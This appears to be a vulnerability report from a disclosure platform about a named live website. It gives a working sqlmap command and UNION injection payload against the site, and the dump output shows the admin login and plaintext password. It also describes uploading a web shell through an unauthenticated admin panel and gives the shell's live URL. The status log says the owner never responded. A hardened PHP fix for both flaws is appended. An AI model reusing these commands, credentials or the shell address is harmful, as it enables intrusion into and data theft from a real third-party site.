Detailed information
The site has an SQL injection vulnerability.
Using this weakness, it is possible to steal sensitive information from the site (passwords, site structure, etc.).
root@kali:~# sqlmap -u http://carkredit.az/az/kurumsal-detay.php?i=1 -D u765618212_cark -T kullanici -C kad,kpasswd --dump
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: i (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: i=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT('qkxzq','MeUyGPiVljpzydkvUNiRMvMWFVkLUpITzwPBcBeR'),'qzzqq')-- VhEt
---
[06:56:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.32
back-end DBMS: MySQL 5 (MariaDB fork)
[06:56:56] [INFO] fetching entries of column(s) 'kad, kpasswd' for table 'kullanici' in database 'u765618212_cark'
[06:56:56] [INFO] the SQL query used returns 1 entries
[06:56:56] [INFO] resumed: "[email protected]","adminck"
[06:56:56] [INFO] analyzing table dump for possible password hashes
Database: u765618212_cark
Table: kullanici
[1 entry]
+-------------------+---------+
| kad | kpasswd |
+-------------------+---------+
| [email protected] | adminck |
+-------------------+---------+
When uploading a site image through the admin page / panel, it is possible to upload a shell by changing the file name extension with the Burp Suite tool. Apart from entering panel1, no password is required. A shell was uploaded to the site for test purposes, but the site was not damaged.
Shell address - http://carkredit.az/images/kurumsal/bhp.php
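
The two findings above, shown as hardened server-side handlers in PHP. This is an added example, not code from the reported site; the `kurumsal` table, its column names, and both function names are hypothetical.

```php
<?php
// Added example (not the site's code). Table, column and function names are assumed.

// Finding 1: the "i" GET parameter must never be concatenated into SQL.
function fetch_detail(PDO $pdo, $rawId)
{
    // Accept only a positive integer; a value such as "1' UNION ALL SELECT ..." fails here.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    if ($id === false) {
        return null;
    }
    // Bound parameter: the value travels as data and is never parsed as SQL text.
    $stmt = $pdo->prepare('SELECT id, title, body, image FROM kurumsal WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Finding 2: the image upload must not trust the client-supplied name or Content-Type,
// because both can be rewritten in transit by an intercepting proxy.
function store_uploaded_image(array $file, $destDir)
{
    $allowed = array('image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif');
    if (!isset($file['error'], $file['tmp_name']) || $file['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return false;
    }
    // Detect the type from the file bytes, not from $file['name'] or $file['type'].
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($file['tmp_name']);
    if (!isset($allowed[$mime]) || @getimagesize($file['tmp_name']) === false) {
        return false;
    }
    // Server-chosen random name with an allowlisted extension: ".php" is never stored.
    $name = bin2hex(openssl_random_pseudo_bytes(16)) . '.' . $allowed[$mime];
    if (!move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        return false;
    }
    return $name; // Store this name in the database instead of the original file name.
}
```

The upload directory should additionally be configured so the web server does not execute scripts from it, and the admin panel itself needs authentication, which the report notes is missing.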
Comments
06 March 2018, 10:53
Vulnerability status
Have not received any information from source

17 January 2018, 09:46
Vulnerability status
Sent e-mail to source about vulnerability

16 January 2018, 07:44
Added point to Vulnerability
Moderator gave 8 points out of 10 to vulnerability

16 January 2018, 07:43
Vulnerability status
Confirmed by Moderator

15 January 2018, 16:06
Vulnerability added
Vulnerability added to BUGemot